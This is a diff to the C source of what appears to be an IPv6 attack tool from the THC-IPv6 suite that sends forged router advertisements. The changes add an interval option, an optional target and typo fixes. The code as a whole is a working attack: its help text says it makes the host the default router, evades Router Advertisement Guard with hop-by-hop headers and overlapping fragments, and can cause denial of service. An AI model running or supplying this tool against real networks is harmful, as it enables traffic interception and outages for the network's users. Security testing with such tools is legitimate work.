@@ -14,20 +14,20 @@
 
 int plife = 99999, rlife = 4096, llife = 2048, reach = 0, trans = 0, dlife = 4096, cnt, to_send = 256, flags = 0, myoff = 14;
 char *frbuf, *frbuf2, *frint, buf3[1232];
-int frbuflen, frbuf2len, do_overlap = 0, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, prio = 2;
+int frbuflen, frbuf2len, do_overlap = 0, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, prio = 2, interval = 5;
 unsigned char *frip6, *frmac;
 thc_ipv6_hdr *frhdr = NULL;
 
 void help(char *prg) {
-  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s [-E type] [-A network/prefix] [-R network/prefix] [-D dns-server] [-s sourceip] [-S sourcemac] [-ardl seconds] [-Tt ms] [-n no] interface\n\n", prg);
+  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s [-E type] [-A network/prefix] [-R network/prefix] [-D dns-server] [-s sourceip] [-S sourcemac] [-ardl seconds] [-Tt ms] [-n no] [-i interval] interface [target]\n\n", prg);
   printf("Options:\n");
   printf(" -A network/prefix  add autoconfiguration network (up to %d times)\n", MAX_ENTRIES);
   printf(" -a seconds         valid lifetime of prefix -A (defaults to %d)\n", plife);
   printf(" -R network/prefix  add a route entry (up to %d times)\n", MAX_ENTRIES);
   printf(" -r seconds         route entry lifetime of -R (defaults to %d)\n", rlife);
   printf(" -D dns-server      specify a DNS server (up to %d times)\n", MAX_ENTRIES);
-  printf(" -L searchlist      specify the DNS domain search list, seperate entries with ,\n");
+  printf(" -L searchlist      specify the DNS domain search list, separate entries with ,\n");
   printf(" -d seconds         dns entry lifetime of -D (defaults to %d\n", dlife);
   printf(" -M mtu             the MTU to send, defaults to the interface setting\n");
   printf(" -s sourceip        the source ip of the router, defaults to your link local\n");
@@ -37,7 +37,7 @@ void help(char *prg) {
   printf(" -t ms              retrans timer (defaults to %d)\n", trans);
   printf(" -p priority        priority \"low\", \"medium\", \"high\" (default), \"reserved\"\n");
   printf(" -F flags           Set one or more of the following flags: managed, other,\n");
-  printf("                   homeagent, proxy, reserved; seperate by comma\n");
+  printf("                   homeagent, proxy, reserved; separate by comma\n");
   printf(" -E type            Router Advertisement Guard Evasion option. Types: \n");
   printf("     H             simple hop-by-hop header\n");
   printf("     1             simple one-shot fragmentation header (can add multiple)\n");
@@ -45,8 +45,9 @@ void help(char *prg) {
   printf("     O             overlapping fragments for keep-first targets (Win, BSD, Mac)\n");
   printf("     o             overlapping fragments for keep-last targets (Linux, Solaris)\n");
   printf("                    Examples: -E H111, -E D\n");      //, -E O, -E o (the last two are best)\n");
-  printf(" -n number         number of RAs to send (default: unlimited)\n");
   printf(" -m mac-address    if only one machine should receive the RAs (not with -E DoO)\n");
+  printf(" -i interval       time between RA packets (default: %d)\n", interval);
+  printf(" -n number         number of RAs to send (default: unlimited)\n");
   printf("\nAnnounce yourself as a router and try to become the default router.\n");
   printf("If a non-existing link-local or mac address is supplied, this results in a DOS.\n");
 //  printf("Use -r to use raw mode.\n\n");
@@ -60,7 +61,7 @@ void send_rs_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned
   if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERSOL || header->caplen < 14 + 40 + 2)
     return;
 
-  if ((pkt = thc_create_ipv6(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
+  if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
     return;
   if (do_hop) {
     type = NXT_HBH;
@@ -96,14 +97,13 @@ void send_rs_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned
 int main(int argc, char *argv[]) {
   char *interface, mac[16] = "", dmac[16] = "";
   unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
-  unsigned char buf[512], *ptr, buf2[6], buf4[6], string[] = "ip6 and icmp6 and dst ff02::2";
+  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
   unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
   unsigned char *dst = thc_resolve6("ff02::1");
   unsigned char *dstmac = thc_get_multicast_mac(dst);
-  unsigned char *dns = NULL;
   int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
-  unsigned char *pkt = NULL, *pkt1, *pkt2, *searchlist = NULL;
-  int pkt_len = 0, pkt_len1, pkt_len2;
+  unsigned char *pkt = NULL, *searchlist = NULL;
+  int pkt_len = 0;
   pcap_t *p;
 
   if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
@@ -112,8 +112,11 @@ int main(int argc, char *argv[]) {
   memset(rbuf, 0, sizeof(rbuf));
   memset(mac, 0, sizeof(mac));
 
-  while ((i = getopt(argc, argv, "r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
+  while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
     switch (i) {
+    case 'i':
+      interval = atoi(optarg);
+      break;
     case 'm':
       sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4],
              (unsigned int *) &dmac[5]);
@@ -309,12 +312,17 @@ int main(int argc, char *argv[]) {
     }
   }
 
-  if ((argc - optind) != 1)
+  if ((argc - optind) < 1 || (argc - optind) > 2)
     help(argv[0]);
 
   if (do_hdr_size)
     myoff = do_hdr_size;
   interface = argv[optind];
+  if (argc - optind == 2)
+    if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
+      fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]);
+      exit(-1);
+    }
   if (mtu == 0)
     mtu = thc_get_mtu(interface);
   if (mac6 == NULL)
@@ -324,7 +332,7 @@ int main(int argc, char *argv[]) {
     }
   if (ip6 == NULL)
     if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) {
-      fprintf(stderr, "Error: ipv6 is not enabled on interface %s\n", interface);
+      fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface);
       exit(-1);
     }
 //  if (dns == NULL)
@@ -482,7 +490,7 @@ int main(int argc, char *argv[]) {
 
   frbuflen = i;
 
-  if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
+  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
     return -1;
 
   if (do_hop) {
@@ -531,7 +539,7 @@ int main(int argc, char *argv[]) {
     while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
     sent++;
     if (sent != to_send || to_send > 255)
-      sleep(5);
+      sleep(interval);
   }
   return 0; // never reached
 }
